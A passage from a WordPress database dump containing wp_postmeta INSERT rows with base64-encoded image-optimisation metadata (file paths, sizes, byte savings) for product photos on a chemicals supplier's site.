J3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9IRUxPWFktYXJvbWF0aWMtZXRoZXItMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzY5ODksImlkIjoxMDcxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSEVMT1hZLWFyb21hdGljLWV0aGVyLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSEVMT1hZLWFyb21hdGljLWV0aGVyLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSEVMT1hZLWFyb21hdGljLWV0aGVyLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc2OTkxLCJpZCI6MTA3MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0hFTE9YWS1hcm9tYXRpYy1ldGhlci0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0hFTE9YWS1hcm9tYXRpYy1ldGhlci0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0hFTE9YWS1hcm9tYXRpYy1ldGhlci0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3Njk5MywiaWQiOjEwNzF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9IRUxPWFktYXJvbWF0aWMtZXRoZXItMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9IRUxPWFktYXJvbWF0aWMtZXRoZXItMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9IRUxPWFktYXJvbWF0aWMtZXRoZXItMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzY5OTYsImlkIjoxMDcxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSEVMT1hZLWFyb21hdGljLWV0aGVyLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSEVMT1hZLWFyb21hdGljLWV0aGVyLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSEVMT1hZLWFyb21hdGljLWV0aGVyLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc2OTk4LCJpZCI6MTA3MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0hFTE9YWS1hcm9tYXRpYy1ldGhlci00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0hFTE9YWS1hcm9tYXRpYy1ldGhlci00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0hFTE9YWS1hcm9tYXRpYy1ldGhlci00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NzAwMSwiaWQiOjEwNzF9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29786, 1070, 'wpfc_optimisation_reduction', '1810458'); 
INSERT INTO `wp_postmeta` VALUES (29787, 1070, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSEVMT1hZLWFsaXBoYXRpYy1ldGhlci5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0hFTE9YWS1hbGlwaGF0aWMtZXRoZXIuanBnIiwid2lkdGgiOjMwNTAsImhlaWdodCI6MjAzMywibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0hFTE9YWS1hbGlwaGF0aWMtZXRoZXIuanBnIiwicmVkdWN0aW9uIjoxODEwNDQ0LCJ0aW1lIjoxNDgzNTc3MDExLCJpZCI6IjEwNzAifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0hFTE9YWS1hbGlwaGF0aWMtZXRoZXItMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9IRUxPWFktYWxpcGhhdGljLWV0aGVyLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSEVMT1hZLWFsaXBoYXRpYy1ldGhlci0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NzAxNCwiaWQiOjEwNzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSEVMT1hZLWFsaXBoYXRpYy1ldGhlci04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0hFTE9YWS1hbGlwaGF0aWMtZXRoZXItODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9IRUxPWFktYWxpcGhhdGljLWV0aGVyLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3MDE3LCJpZCI6MTA3MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9IRUxPWFktYWxpcGhhdGljLWV0aGVyLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSEVMT1hZLWFsaXBoYXRpYy1ldGhlci03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0hFTE9YWS1hbGlwaGF0aWMtZXRoZXItNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzcwMjAsImlkIjoxMDcwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0hFTE9YWS1hbGlwaGF0aWMtZXRoZXItMTYwMHgxMDY2LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSEVMT1hZLWFsaXBoYXRpYy1ldGhlci0xNjAweDEwNjYuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSEVMT1hZLWFsaXBoYXRpYy1ldGhlci0xNjAweDEwNjYuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3MDI0LCJpZCI6MTA3MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9IRUxPWFktYWxpcGhhdGljLWV0aGVyLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSEVMT1hZLWFsaXBoYXRpYy1ldGhlci0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0hFTE9YWS1hbGlwaGF0aWMtZXRoZXItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzcwMjYsImlkIjoxMDcwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0hFTE9YWS1hbGlwaGF0aWMtZXRoZXItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9IRUxPWFktYWxpcGhhdGljLWV0aGVyLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSEVMT1hZLWFsaXBoYXRpYy1ldGhlci0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NzAyOCwiaWQiOjEwNzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSEVMT1hZLWFsaXBoYXRpYy1ldGhlci0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0hFTE9YWS1hbGlwaGF0aWMtZXRoZXItMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9IRUxPWFktYWxpcGhhdGljLWV0aGVyLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3MDMxLCJpZCI6MTA3MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9IRUxPWFktYWxpcGhhdGljLWV0aGVyLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSEVMT1hZLWFsaXBoYXRpYy1ldGhlci01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0hFTE9YWS1hbGlwaGF0aWMtZXRoZXItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzcwMzMsImlkIjoxMDcwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSEVMT1hZLWFsaXBoYXRpYy1ldGhlci0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0hFTE9YWS1hbGlwaGF0aWMtZXRoZXItMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9IRUxPWFktYWxpcGhhdGljLWV0aGVyLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3MDM2LCJpZCI6MTA3MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0hFTE9YWS1hbGlwaGF0aWMtZXRoZXItMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9IRUxPWFktYWxpcGhhdGljLWV0aGVyLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSEVMT1hZLWFsaXBoYXRpYy1ldGhlci0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NzAzOCwiaWQiOjEwNzB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9IRUxPWFktYWxpcGhhdGljLWV0aGVyLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSEVMT1hZLWFsaXBoYXRpYy1ldGhlci0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0hFTE9YWS1hbGlwaGF0aWMtZXRoZXItMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzcwNDEsImlkIjoxMDcwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSEVMT1hZLWFsaXBoYXRpYy1ldGhlci0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0hFTE9YWS1hbGlwaGF0aWMtZXRoZXItMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9IRUxPWFktYWxpcGhhdGljLWV0aGVyLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3MDQzLCJpZCI6MTA3MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0hFTE9YWS1hbGlwaGF0aWMtZXRoZXItMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9IRUxPWFktYWxpcGhhdGljLWV0aGVyLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSEVMT1hZLWFsaXBoYXRpYy1ldGhlci0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NzA0NiwiaWQiOjEwNzB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9IRUxPWFktYWxpcGhhdGljLWV0aGVyLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSEVMT1hZLWFsaXBoYXRpYy1ldGhlci00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0hFTE9YWS1hbGlwaGF0aWMtZXRoZXItNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzcwNDgsImlkIjoxMDcwfV0='); 
INSERT INTO `wp_postmeta` VALUES (29788, 1058, 'wpfc_optimisation_reduction', '11093'); 
INSERT INTO `wp_postmeta` VALUES (29789, 1058, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS1XLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS1XLmpwZyIsIndpZHRoIjo1NDgxLCJoZWlnaHQiOjM2NDgsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NzcwNTMsImlkIjoiMTA1OCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS1XLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS1XLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS1XLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo0NzksInRpbWUiOjE0ODM1NzcwNTYsImlkIjoxMDU4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtVy04MDB4NTMyLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtVy04MDB4NTMyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtVy04MDB4NTMyLmpwZyIsInJlZHVjdGlvbiI6NzgwLCJ0aW1lIjoxNDgzNTc3MDYwLCJpZCI6MTA1OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLVctNzY4eDUxMS5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLVctNzY4eDUxMS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLVctNzY4eDUxMS5qcGciLCJyZWR1Y3Rpb24iOjcwMSwidGltZSI6MTQ4MzU3NzA2NCwiaWQiOjEwNTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS1XLTE2MDB4MTA2NS5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtVy0xNjAweDEwNjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS1XLTE2MDB4MTA2NS5qcGciLCJyZWR1Y3Rpb24iOjM3MzcsInRpbWUiOjE0ODM1NzcwNjksImlkIjoxMDU4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtVy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtVy0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtVy0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NDcyLCJ0aW1lIjoxNDgzNTc3MDcyLCJpZCI6MTA1OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIw